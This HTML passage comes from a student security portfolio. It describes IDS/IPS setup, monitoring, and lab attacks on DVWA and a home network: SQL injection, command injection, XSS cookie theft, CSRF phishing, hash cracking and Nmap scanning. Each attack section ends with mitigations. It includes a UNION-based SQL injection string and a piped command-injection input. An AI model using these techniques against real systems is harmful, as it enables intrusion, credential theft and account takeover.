          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
